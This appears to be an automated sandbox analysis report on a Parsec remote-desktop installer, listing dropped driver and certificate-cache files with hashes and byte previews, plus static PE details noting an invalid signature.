                            Download File
                            Process:C:\Windows\System32\drvinst.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):26680
                            Entropy (8bit):6.39482709996269
                            Encrypted:false
                            SSDEEP:384:OOq45ajAwai+E3n5bWbkcBnqRTjdfHpl1eUNh3YDX+iR9zYjI:O/45al/RcVw1Hf1zH3YDuO9zyI
                            MD5:0790B2E5B9D6B38B566C6BC796F0364A
                            SHA1:1C87512273F9E98E43EA1B048A67995A93E02B4E
                            SHA-256:4B98D337ED94646D10BDB0395A29D10DCAC50C660C5176C1937A823301BD6CA1
                            SHA-512:03A8E2BE9C98385EC13CDE7EE321AB73235289DE22DEB1029B795392B90A447DFA46182D40CBBC091B39AB0DF8F5A8E9FC7A80F1D839F36EC8C678BDF746844E
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"..C..C..C..;..C..C..C..;..C..C..C..;..C..;..C.....C...5..C.....C.Rich.C.........................PE..d...o..e.........."....&.&..........p..........@....................................[.....`A.................................................q..P............P.......@..8(......<...`5..8........................... 4..@............0...............................text............................... ..h.rdata.......0......................@..H.data........@.......&..............@....pdata.......P.......(..............@..HPAGE....l....`.......*.............. ..`INIT...."....p.......4.............. ..b.rsrc................:..............@..B.reloc..<............>..............@..B........................................................................................................................................................................

                            C:\Windows\System32\DriverStore\Temp\{7106dfa1-62ec-4647-bfd5-42198dd8ac12}\parsecvirtualds.cat (copy)

                            Download File
                            Process:C:\Windows\System32\drvinst.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):11858
                            Entropy (8bit):7.334407083811773
                            Encrypted:false
                            SSDEEP:192:1zQ2L1BJCdnEwKUNhYCxTBm+0U8X01k9z3AGTObrQ:1PlUNh3xTBmo8R9zNKo
                            MD5:560EFA3FA6E5AB486D958B12207AC6ED
                            SHA1:69B8EBE8AE3D9AF94886DC1C9C52FC858B5AFFAB
                            SHA-256:16DB056748CAEB3B2D6ABBF9F6C77F34DD0F81D3BBF4E65DA2EE4F2FD0B55681
                            SHA-512:A4761740090CDBA84CDA9E9A805C695567B6ED5C79AB339DA315679124B7C9F05CC0B2DE53DFB58D133CE67F30F5DDE5A20C2F2A1330C9C8F4A85ABDD674456F
                            Malicious:false
                            Preview:0..N..*.H.........?0..;...1.0...`.H.e......0.....+.....7.....r0..n0...+.....7......i.h..!M.K6..kB...240306184122Z0...+.....7.....0...0.....oX0o ...Vg...$.-. .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0.... 'Fd....#...m0cJ..0.........d..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... 'Fd....#...m0cJ..0.........d..0..........U..,...\.#.s..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0.... ...."..3..6F......$rY..T....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0U..+.....7...1G0E0...+.....7.......010...

                            C:\Windows\System32\DriverStore\Temp\{7106dfa1-62ec-4647-bfd5-42198dd8ac12}\parsecvirtualds.inf (copy)

                            Download File
                            Process:C:\Windows\System32\drvinst.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):1311
                            Entropy (8bit):5.255673591625164
                            Encrypted:false
                            SSDEEP:24:fWHjKOUPiE492k6StyO8rKd8tYxrCddcdg1xOjLtxlDxXL6qVt5poZQxWx00:092iEu2kmO/wYxefc61xOjLtxRxWq35y
                            MD5:AC423F3B285C615E7BEC73DC2FA71D20
                            SHA1:A508A10AD7DE55F0EC2CE9C4135CE623B773BF1D
                            SHA-256:E31AEFF7229AD9B63394FB3646F7DFDDE2EA8BBE8B247259A5A9548FE3CD89E3
                            SHA-512:FF2ECBA42697815F906D4E5501F9C4B33CD5652432DFB26302644AD385B40E361C32E0120603002D93DC12B0C38E081D5FF0CCE6145A0420BA0EE70A22FE3B07
                            Malicious:false
                            Preview:;..; Parsec Virtual DS USB filter driver for fixing UDE compatibility with USBAUDIO.SYS..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36FC9E60-C465-11CF-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvirtualds.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvirtualds.sys = 1,,....[DestinationDirs]..DefaultDestDir = 12..parsecvirtualds.DriverFiles = 12....[DefaultInstall.NTamd64]..OptionDesc = %parsecvirtualdsServiceDesc%..CopyFiles = parsecvirtualds.DriverFiles....[DefaultUninstall.NTamd64]..LegacyUninstall = 1....[parsecvirtualds.DriverFiles]..parsecvirtualds.sys....[DefaultInstall.NTamd64.Services]..AddService = %parsecvirtualdsServiceName%,,parsecvirtualds.Service....[parsecvirtualds.Service]..DisplayName = %parsecvirtualdsServiceName%..Description = %parsecvirtualdsServiceDesc%..ServiceBinary = %12%\parsecvirtualds.sys..ServiceType = 1 ; SERVICE_KERNEL_DRI

                            C:\Windows\System32\DriverStore\Temp\{7106dfa1-62ec-4647-bfd5-42198dd8ac12}\parsecvirtualds.sys (copy)

                            Download File
                            Process:C:\Windows\System32\drvinst.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):26680
                            Entropy (8bit):6.39482709996269
                            Encrypted:false
                            SSDEEP:384:OOq45ajAwai+E3n5bWbkcBnqRTjdfHpl1eUNh3YDX+iR9zYjI:O/45al/RcVw1Hf1zH3YDuO9zyI
                            MD5:0790B2E5B9D6B38B566C6BC796F0364A
                            SHA1:1C87512273F9E98E43EA1B048A67995A93E02B4E
                            SHA-256:4B98D337ED94646D10BDB0395A29D10DCAC50C660C5176C1937A823301BD6CA1
                            SHA-512:03A8E2BE9C98385EC13CDE7EE321AB73235289DE22DEB1029B795392B90A447DFA46182D40CBBC091B39AB0DF8F5A8E9FC7A80F1D839F36EC8C678BDF746844E
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"..C..C..C..;..C..C..C..;..C..C..C..;..C..;..C.....C...5..C.....C.Rich.C.........................PE..d...o..e.........."....&.&..........p..........@....................................[.....`A.................................................q..P............P.......@..8(......<...`5..8........................... 4..@............0...............................text............................... ..h.rdata.......0......................@..H.data........@.......&..............@....pdata.......P.......(..............@..HPAGE....l....`.......*.............. ..`INIT...."....p.......4.............. ..b.rsrc................:..............@..B.reloc..<............>..............@..B........................................................................................................................................................................

                            C:\Windows\System32\catroot2\dberr.txt

                            Download File
                            Process:C:\Windows\System32\drvinst.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:modified
                            Size (bytes):3549
                            Entropy (8bit):5.36373347255303
                            Encrypted:false
                            SSDEEP:96:QO00eO00erMwUgWUg0B1kE3ZhpJp8ZpkRepk3YpgpNun:QO00eO00erMwmkB1kAa
                            MD5:39BA3CD19F83809E3342490E48164EE6
                            SHA1:98EFEAADB2C862B6F6F359D5EABC6D9C103BAD43
                            SHA-256:2EC08E9934ED59BEF914F7AC9076A92976A66543B69FE95ADDDAEECA314022D0
                            SHA-512:DCCE5ABFA6DF3CB66C5EAB254DC00241464E0F8E623CDACA01EA5FD708B4BA50C670CCB100E46CFA2FD4A79E0C0C119A3B63F5FAD88B6CBA374D7DC46CBA667B
                            Malicious:false
                            Preview:CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6041 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6699 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #4398 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6041 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6699 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #4398 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #2083 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #2459 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: SyncAllDBs Corruption or Schema Change..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #891 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #1307 encountered JET error -1601..CatalogDB: 08:57:12 03/10/2023: SyncDB:: Sync sta

                            C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1A374813EDB1A6631387E414D3E73232

                            Download File
                            Process:C:\Program Files\Parsec\pservice.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):110008
                            Entropy (8bit):6.450823294476483
                            Encrypted:false
                            SSDEEP:1536:KR5Ea4gGk28tEFVZ3t0zfIagnbSLDII+D61SdOkC7P:KHEpgG98KZ3+gbE8pD61JD
                            MD5:BADAC8C897F02A15D3788C6D3A7D6E43
                            SHA1:8E5FF02FB8B98D2D66AFA3ACEB6CA7797B3D040A
                            SHA-256:21342CFB9CFD76F7B1F40A7AF7EF35500AD713964BE8BFB48559715D38B57E22
                            SHA-512:38AF1329D3F154E90A04DACA368AA6203A6225F73976010377E948109624F8D0B2CF7355808E75E6A9472D6195079E968C4D1BA2E1A7BB901093F3FBE2ED690D
                            Malicious:false
                            Preview:0....0.......0...*.H........0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1..241113124751Z..241120124751Z0....0!.......0.E....[0...210531000001Z0!...7g...(..^`.x.l...210531000001Z0!...\./M.8..>.f.....210531000001Z0!...*B.Sh...f...s.0..210531000001Z0!..../n...h..7....>..210601000001Z0!....0..>5..aN.u{D..210601000001Z0!...-...qpWa.!n.....210601000001Z0!..."f...\..N.....X..210601000001Z0!...in.H...[u...]....210602000001Z0!......S....fNj'.wy..210602000001Z0!......C.lm..B.*.....210602000001Z0!......`......._.]...210602000001Z0!...{..e..i......=..210602000001Z0!... .}...|.,dk...+..210603000001Z0!...U.K....o.".Rj..210603000001Z0!.....A...K.ZpK..'h..210603000001Z0!.....&}{ ......l..210603000001Z0!...:.m...I.p.;..v..210604000001Z0!...1"uw3..Gou.qg.q..210607000001Z0!...1.o}...c/...-R}..210608000001Z0!................210608000001Z0!...[.N.d............210609000001Z0!......x..i........210610000001Z0!...(... (..#.^.f...210

                            C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\329B6147266C1E26CD774EA22B79EC2E

                            Download File
                            Process:C:\Program Files\Parsec\pservice.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):110008
                            Entropy (8bit):6.450823294476483
                            Encrypted:false
                            SSDEEP:1536:KR5Ea4gGk28tEFVZ3t0zfIagnbSLDII+D61SdOkC7P:KHEpgG98KZ3+gbE8pD61JD
                            MD5:BADAC8C897F02A15D3788C6D3A7D6E43
                            SHA1:8E5FF02FB8B98D2D66AFA3ACEB6CA7797B3D040A
                            SHA-256:21342CFB9CFD76F7B1F40A7AF7EF35500AD713964BE8BFB48559715D38B57E22
                            SHA-512:38AF1329D3F154E90A04DACA368AA6203A6225F73976010377E948109624F8D0B2CF7355808E75E6A9472D6195079E968C4D1BA2E1A7BB901093F3FBE2ED690D
                            Malicious:false
                            Preview:0....0.......0...*.H........0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1..241113124751Z..241120124751Z0....0!.......0.E....[0...210531000001Z0!...7g...(..^`.x.l...210531000001Z0!...\./M.8..>.f.....210531000001Z0!...*B.Sh...f...s.0..210531000001Z0!..../n...h..7....>..210601000001Z0!....0..>5..aN.u{D..210601000001Z0!...-...qpWa.!n.....210601000001Z0!..."f...\..N.....X..210601000001Z0!...in.H...[u...]....210602000001Z0!......S....fNj'.wy..210602000001Z0!......C.lm..B.*.....210602000001Z0!......`......._.]...210602000001Z0!...{..e..i......=..210602000001Z0!... .}...|.,dk...+..210603000001Z0!...U.K....o.".Rj..210603000001Z0!.....A...K.ZpK..'h..210603000001Z0!.....&}{ ......l..210603000001Z0!...:.m...I.p.;..v..210604000001Z0!...1"uw3..Gou.qg.q..210607000001Z0!...1.o}...c/...-R}..210608000001Z0!................210608000001Z0!...[.N.d............210609000001Z0!......x..i........210610000001Z0!...(... (..#.^.f...210

                            C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB

                            Download File
                            Process:C:\Program Files\Parsec\pservice.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):471
                            Entropy (8bit):7.2391775057961
                            Encrypted:false
                            SSDEEP:12:JyYOY5GLsHxIDJhfxyGFFROABVkhS/m7dUM:JROYILsIfLFFo2VOMm7df
                            MD5:DE60388F3921FE0CD4272D7FC99A4BD9
                            SHA1:4726073B006C9B54CDCB378212DEE2CDD4BD622B
                            SHA-256:9E8579E6133A72D13A0704175FB50353BEF2876E04E0B510D32791E47AC94C31
                            SHA-512:84325EFE7125E5C12ADBFB5EDD96147E3211C8128E02183EFFA7DB9C52255F8CE1FF20EAE5EB50E999CB4A8528EA3F8B4FB09E5FE85478559688C1B208691E0C
                            Malicious:false
                            Preview:0..........0.....+.....0......0...0......E....1-Q...!..m....20241112190516Z0s0q0I0...+...........@..D3=?..Mn8...Q..E....1-Q...!..m..........-...P..@.Z....20241112190516Z....20241119190516Z0...*.H.............lN.u.GpZc..$.rA.H.2..R...w.....y|{|5...W..? x.i..t...~.t.:j..vf^P94.a-.3K..+[......6..jU..l.Q..i.a.T......y....&H .h...9.4T.4.......U.X.9....L...{=Us....1>.w..f@..%....X=M..Z.....9/:.z.....w_iH;./.@........(u.zI........h.B....+.'a...l.)1B.0.V.

                            C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DD342DC083F9240614EBCF70523A8426

                            Download File
                            Process:C:\Program Files\Parsec\pservice.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):727
                            Entropy (8bit):7.559119648888612
                            Encrypted:false
                            SSDEEP:12:5o6Tq9Vc5h44T6YC0r7EnpnS+VKdQcBwAhcaL5vsKDHznWrV/ys4y4k10HQbclA8:5ccfXsnSn7W25E+TWrxgk0HQbclAid3
                            MD5:A5634042EFD3730706BDEE80476B450A
                            SHA1:8ABBFE4869BE217929491545A01C3ED6A7071E18
                            SHA-256:A5A9EF0B62E17CE6AF43E25491E803C00D239B160D068DEC310DEC2F86D9895E
                            SHA-512:8C1C57E7FA4CE47B1592BF44C552191357AC735A5DE5FBC5F0A472F5D9E15F71CB7C38A0F094D64089FA53B58D923A44C7D660C9F7A840C934DEEC50B7A5887D
                            Malicious:false
                            Preview:0..........0.....+.....0......0...0......h7..;._....a{..e.NB..20241113202459Z0s0q0I0...+.........]....^Idk...NG.X....h7..;._....a{..e.NB...h..3P....g..[....20241113200902Z....20241120190902Z0...*.H.............wC...._x.H.....8$4...Q...sB. .!U.........:.....t]...N.*,.T...M...{.g..wlGb,QOOn..o].B.....~.yo.`._.Q..l..a.~D.3.V....O....,.+VQbq.$.6..Y.5.K.?........../w.......V.~.x..KZ.... .f...D.}....z......~S.'/.Q:Ce.".....S_..5...dd.c.S&...@.L.4..5.&..\..h.,..|....zS...4....}._B.;.c.s...*..E.T...F.Hc8...1....-.<..XcFyg{..I......Z7.n........R7T......S..u._......]g.."vn.P.... ..3..rA$.BR..y=....a=.3.vZ_..a..Wg..M.e.b.)..lL..m.f/,..v.O..Y.NLM...........$.1?c....d.T..Q..l....'.`\s.2Z>.g..q..O..a..

                            C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                            Download File
                            Process:C:\Program Files\Parsec\pservice.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):727
                            Entropy (8bit):7.55159694457111
                            Encrypted:false
                            SSDEEP:12:5onfZfc5RlRtBfQ9x4hsjfSS97Jrm6FEL2eGszjXvScgwDoJh5oMVmfCw8iATw:5ixcdZOx4hwaSZJnFEbSY6suuCwvATw
                            MD5:50C2ACCA85675897B36B7B4BE3146ABF
                            SHA1:73F0C48A8FB60EC92EBA17C7A901703234CD0F8F
                            SHA-256:0463055A40E90C7B44AE7273A2480F8FC5AC657EB7CDFD2F1D7E44129CCD5E76
                            SHA-512:1902E8B97988E3D68B02047D68686BF3C68B36E262014F0B40EF920D066B83F21FBBACA5EC3B3C37C961FC06EE39A2FAFE42A896D54F1A4FC748A31D71BA3E61
                            Malicious:false
                            Preview:0..........0.....+.....0......0...0..........q]dL..g?....O..20241113184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20241113184215Z....20241120184215Z0...*.H.............9....i.3L../9Y...../I.df...'*9....>i..`*};GZq%k...O..P.{...3F.....2r......W[....j........PY.&..h=.T....zY..Y0..Ou.!...1...(.RN....v..&8H.$_H......(.. HX.=..#.3A.'...<..T...1^.ZRx..V....v..y..Y....._.r.eh.[.b...<o./..;8.Vf;K.&6{.3o.0K^.Z.........U....7.*x.A......1...!........u`[SB.5%.y`..~_M..g.i......_..t.1K.<@S.d/6d.f.ya.G....l..rv..@.k}\p...d.........r..(..d..5V..v....5.@7:....#]J..o.H.tT...l.0#Y.y.@..9.Y..T.+.f8A..R.p.8.O+/....>lK...p5).,(.3.#s&.......C.Z.R...Y..a"Q...4....E....

                            C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1A374813EDB1A6631387E414D3E73232

                            Download File
                            Process:C:\Program Files\Parsec\pservice.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):306
                            Entropy (8bit):3.220212386998742
                            Encrypted:false
                            SSDEEP:6:kKDM78OQrI3AUSW0P3PeXJUwh8lmi36lWaTW:bKfQrI3xSW0P3PeXJUZ6JS
                            MD5:4699E9989F734748906A267859D10F52
                            SHA1:1B414C23374606BF27C55B53153552EB81F74099
                            SHA-256:3F74FADB22AEAF2875B0763E25164F9FFEE1E7A015D8A6DE9669D62A58393E5D
                            SHA-512:70156AD52B3D5D97E0AACDEED0E1467FEA99BFD75B2700C6406596514D68E7C88867A1DB7C3FAA9EDF690B7C6380491F26AC83CA2C7BB19BA87FC4ED964D5F4F
                            Malicious:false
                            Preview:p...... .........o6.86..(....................................................... ............5.. ..."...............h.t.t.p.:././.c.r.l.3...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.l...".6.7.3.4.a.6.5.c.-.1.a.d.b.8."...

                            C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\329B6147266C1E26CD774EA22B79EC2E

                            Download File
                            Process:C:\Program Files\Parsec\pservice.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):306
                            Entropy (8bit):3.229215287332609
                            Encrypted:false
                            SSDEEP:6:kKqAJV8OQrIXOAUSW0P3PeXJUwh8lmi36lWaTW:iyVfQrIexSW0P3PeXJUZ6JS
                            MD5:1160901690DC8D967A8A1B439FA57427
                            SHA1:749F64D96B8A3F6C73C4FEBF02E15F9BF9CE4DED
                            SHA-256:4B9326963414219D4B4C8F7822E70A8878CE16139CC66BB986D698ECB0894DC6
                            SHA-512:4F58A2948E6F40A8AC2B887EBC18F674355064945CF626A7348EB1D47C8C903131B25E45701F38BCFE5D5543911653B85B77CBF6FB40A755780228E4A9133048
                            Malicious:false
                            Preview:p...... ........7.3.86..(....................................................... ............5.. ..."...............h.t.t.p.:././.c.r.l.4...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.l...".6.7.3.4.a.6.5.c.-.1.a.d.b.8."...

                            C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB

                            Download File
                            Process:C:\Program Files\Parsec\pservice.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):400
                            Entropy (8bit):3.9274225995733856
                            Encrypted:false
                            SSDEEP:6:kK99/VEk9/IBYFHXlRNfOAUMivhClroFzCJCgO3lwuqDnlyQ4hY5isIlQhZgJn:l9/VAihmxMiv8sFzD3quqDkPh8Y2ZM
                            MD5:3B21741D3AEEC27B411348C68722A338
                            SHA1:EF9864542A4148DC51B566A05F469261260E63F9
                            SHA-256:5F2A462AD9BCF3349407DEC97364A52FC78A19ADF8C6BAE720A006630B6B7531
                            SHA-512:990F16050C78084767FC7765F969DE6844703F3D99E2E4345109DC4EFD28C4273C596B94EDA50B64B375C181572C31F995D420D30BC9B6AC22060B1A7E1E8467
                            Malicious:false
                            Preview:p...... ..........v.86..(................>..55...~...:...................~...:.. ..........d-6.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.3.x.L.4.L.Q.L.X.D.R.D.M.9.P.6.6.5.T.W.4.4.2.v.r.s.U.Q.Q.U.R.e.u.i.r.%.2.F.S.S.y.4.I.x.L.V.G.L.p.6.c.h.n.f.N.t.y.A.8.C.E.A.6.b.G.I.7.5.0.C.3.n.7.9.t.Q.4.g.h.A.G.F.o.%.3.D...

                            C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DD342DC083F9240614EBCF70523A8426

                            Download File
                            Process:C:\Program Files\Parsec\pservice.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):408
                            Entropy (8bit):3.5195697432359827
                            Encrypted:false
                            SSDEEP:6:kKeik9QfOAUMivhClroFHXHDZA6liyZlSlMul0bg3PWovy28lhle6C9o1kn:2irmxMiv8sF3HtllJZIvOP20S9o1k
                            MD5:7FBDF0E5585309643DEC5BADF55E140A
                            SHA1:3E64A3BADDAD6388425BEBD9CDF90DF23506F4AC
                            SHA-256:276735EE85A15DF941E4B7ADD5C286212E118E05DE02DFDD0387138FDFC47BA8
                            SHA-512:73D689CCB23C5403D9119329DE2439E9F0A22909DA08255254C5EAC3E45DD377A6542288C1902E2D29A662FDDF2C0EA591D81A4CCCD2C4A86971B9F5C3F85E37
                            Malicious:false
                            Preview:p...... ....$.....i.86..(....................................................... ........H.r56.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.S.R.X.e.r.F.0.e.F.e.S.W.R.r.i.p.T.g.T.k.c.J.W.M.m.7.i.Q.Q.U.a.D.f.g.6.7.Y.7.%.2.B.F.8.R.h.v.v.%.2.B.Y.X.s.I.i.G.X.0.T.k.I.C.E.A.l.o.E.u.g.z.U.P.G.t.9.O.n.V.Z.%.2.F.P.P.g.l.s.%.3.D...

                            C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                            Download File
                            Process:C:\Program Files\Parsec\pservice.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):412
                            Entropy (8bit):3.990411947927068
                            Encrypted:false
                            SSDEEP:6:kK/lNzR1MyFiUfOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkrn:lRRBJmxMiv8sFBSfamB3rbFURMOlAkr
                            MD5:CA440612BBB7BDE0C282E5E197EF9659
                            SHA1:EB6CED3ABE211A813EE31B6654773602CFE54424
                            SHA-256:69C7BE1C023E7A7CA6A9426CE408AC18F9A178000EBF3E7CB4C4FD2239B7BF11
                            SHA-512:68D555F5A996FDF913384B7D7330FC5794DCCA4F31AADE3F300E37563D72FB02D69F4FCD6120F75E311DC31D59344A87C50A4274220CD6AE5E08AE9D54BA3DFE
                            Malicious:false
                            Preview:p...... ....(.../.o.86..(.................F..5...]*.{;...................]*.{;.. ..........[-6.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...

                            \Device\ConDrv

                            Download File
                            Process:C:\Windows\SysWOW64\netsh.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):7
                            Entropy (8bit):2.2359263506290326
                            Encrypted:false
                            SSDEEP:3:t:t
                            MD5:F1CA165C0DA831C9A17D08C4DECBD114
                            SHA1:D750F8260312A40968458169B496C40DACC751CA
                            SHA-256:ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
                            SHA-512:052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
                            Malicious:false
                            Preview:Ok.....

                            \Device\Null

                            Download File
                            Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):70
                            Entropy (8bit):4.898726367124714
                            Encrypted:false
                            SSDEEP:3:tR6QyPKj+wcRCFMLDJOBFXRN8y:fyyCwcZLDJOBFBN8y
                            MD5:E3C1941CBFB3DBDAD9103476189F8F85
                            SHA1:BE404907AAFD3A0F612875CC62628B1A2C2982F3
                            SHA-256:9C62B28C253E3D71051A6AF5C09E924F2096F181DC03C56D8A10CB6E0BA9644A
                            SHA-512:2917A82BE1E1F746AC1A15A82D3CF4628F3DF4898E4474C1309A72B6F6D792725F8FA3CC59C4FFFDFA8241965AD6651B59FAD89C078B49126EDF7474F78E10B1
                            Malicious:false
                            Preview:2024-11-13 20:58:48,646 INFO [default] Driver installed successfully..

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.997278229743437
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 98.45%
                            • Inno Setup installer (109748/4) 1.08%
                            • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            File name:uu8v4UUzTU.exe
                            File size:50'493'432 bytes
                            MD5:2d2f050e6c898065032cb2686a0effca
                            SHA1:0d3c1fbd9b7db74fdb5ee155b610d86319d9fa51
                            SHA256:4c750c11a04f90c9922ace4a237dc256d7e71fa512d4857922cc7d46bb4ba0e9
                            SHA512:5fcd58c259cd020f5b4afe8802a6588e7a942ef53cf5175f6f18c900e8ed7e6b5009370b0b0e06969e4ecc7c26dcd7e8f3318907411fc7df62ccb797ec04f67e
                            SSDEEP:786432:HyiiDc4ImIc9SLIJyNwsNBIRya++/sC89UTh/1m1OO2+3FJRYd17TV+s:SiiD9KL85sNBIRyX0M9gG1OO//2rh+s
                            TLSH:E4B7333B71A4B43FC4AA463A5F73531448B37E91A9C78D2A43E0161CCB25EA01E7A777
                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                            File Icon

                            Icon Hash:01020d1930310f3c

                            Static PE Info

                            General

                            Entrypoint:0x4b5eec
                            Entrypoint Section:.itext
                            Digitally signed:true
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Time Stamp:0x6258476F [Thu Apr 14 16:10:23 2022 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:1
                            File Version Major:6
                            File Version Minor:1
                            Subsystem Version Major:6
                            Subsystem Version Minor:1
                            Import Hash:e569e6f445d32ba23766ad67d1e3787f

                            Authenticode Signature

                            Signature Valid:false
                            Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
